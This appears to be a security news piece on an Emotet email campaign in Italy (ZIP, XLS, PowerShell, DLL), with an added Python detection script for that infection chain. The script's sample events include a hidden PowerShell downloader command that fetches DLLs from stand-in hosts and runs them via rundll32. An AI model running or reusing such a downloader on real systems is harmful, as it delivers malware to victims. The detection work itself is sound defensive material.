
Cybercrime, Emotet returns to Italy via “RE: Email” email

Technical analysis by the Malware Hunter JAMESWT

Emotet returns to Italy via an email with the subject “RE: Email”. The ZIP attachment contains an XLS file which launches a PowerShell script; the script contacts several URLs, downloads a DLL and starts the malware infection chain.

Emotet hides in an email that arrived in Italy with the subject “RE: Email”, armed with a password-protected ZIP attachment (the password is given in the body of the message).


Inside the compressed archive there is an XLS file which, when opened, launches a PowerShell script that contacts several URLs in turn and downloads a DLL, starting the malware infection chain. Emotet began as a banking trojan used by cybercrime groups; over time modules have been added that let it steal credentials saved by applications on the victims' machines, spread to other computers on the same network, and harvest the victims' emails for reuse in later spam campaigns.
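The chain above (Office document, PowerShell downloader, DLL executed from a user-writable path) is what a detection engineer would hunt for in process-creation telemetry. The following is an added example, not code from the original analysis: it runs a small set of rules over constructed sample events. The field names loosely follow Sysmon Event ID 1, and all pids, paths and URLs are invented; the Word/PowerPoint entries generalise beyond the XLS lure described here.

```python
"""Detection of the Emotet-style chain described above
(Excel -> PowerShell downloader -> DLL executed via rundll32)
over process-creation telemetry.  The events below are constructed
for this example; the field names loosely follow Sysmon Event ID 1
but are an assumption, not a capture from the campaign."""
import re

# Office apps whose child PowerShell is suspicious.  The article's
# lure is an XLS, so EXCEL.EXE is the case that matters here; the
# other two generalise to Word/PowerPoint lures.
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe"}

# Download primitives commonly seen in script downloaders.
DOWNLOAD_RE = re.compile(
    r"net\.webclient|downloadfile|downloadstring|invoke-webrequest|"
    r"\biwr\b|\bcurl\b|https?://", re.I)
# DLL paths under directories a standard user can write to.
USER_WRITABLE_RE = re.compile(r"\\users\\|\\programdata\\|\\temp\\", re.I)
DLL_PATH_RE = re.compile(r'([A-Za-z]:\\[^,"\s]+\.dll)', re.I)

# Constructed sample telemetry (pids, paths and URLs are invented).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": r'"EXCEL.EXE" C:\Users\user\Downloads\invoice.xls'},
    {"pid": 300, "ppid": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": ("powershell -w hidden -ep bypass -c \"$u="
                 "'http://example.invalid/a.dll','http://example.invalid/b.dll';"
                 "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile("
                 "$x,'C:\\Users\\user\\AppData\\Local\\Temp\\a.dll');break}catch{}}\"")},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\user\AppData\Local\Temp\a.dll,Control_RunDLL"},
    # Benign noise: an admin shell from Explorer, and rundll32 loading a system DLL.
    {"pid": 500, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-ChildItem C:\\logs"},
    {"pid": 600, "ppid": 1, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(event, by_pid, max_depth=10):
    """Image names of the process's ancestors, nearest first."""
    chain, cur = [], by_pid.get(event["ppid"])
    while cur is not None and len(chain) < max_depth:
        chain.append(basename(cur["image"]))
        cur = by_pid.get(cur["ppid"])
    return chain


def detect_chains(events):
    """Return one alert per event matching a stage of the chain."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name, lineage = basename(e["image"]), ancestors(e, by_pid)
        # Stages 1-2: an Office document spawning PowerShell; a download
        # primitive on the command line raises the severity.
        if name in INTERPRETERS and lineage and lineage[0] in OFFICE_APPS:
            alerts.append({
                "pid": e["pid"], "rule": "office_spawns_powershell",
                "severity": "high" if DOWNLOAD_RE.search(e["cmdline"]) else "medium"})
        # Stage 3: rundll32 loading a DLL from a user-writable location;
        # an Office app anywhere in the lineage ties it back to the lure.
        if name == "rundll32.exe":
            m = DLL_PATH_RE.search(e["cmdline"])
            if m and USER_WRITABLE_RE.search(m.group(1)):
                alerts.append({
                    "pid": e["pid"], "rule": "rundll32_user_writable_dll",
                    "severity": "high" if OFFICE_APPS & set(lineage) else "medium"})
    return alerts


if __name__ == "__main__":
    for a in detect_chains(SAMPLE_EVENTS):
        print(a)
```

Run against the constructed events, the two malicious stages (pid 300 and pid 400) are flagged at high severity while the Explorer-launched shell and the system-DLL rundll32 produce nothing. In production the same logic would read Sysmon or EDR events rather than an inline list, and the user-writable path regex should be tuned to the environment's actual write-permissions.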

Malware C2
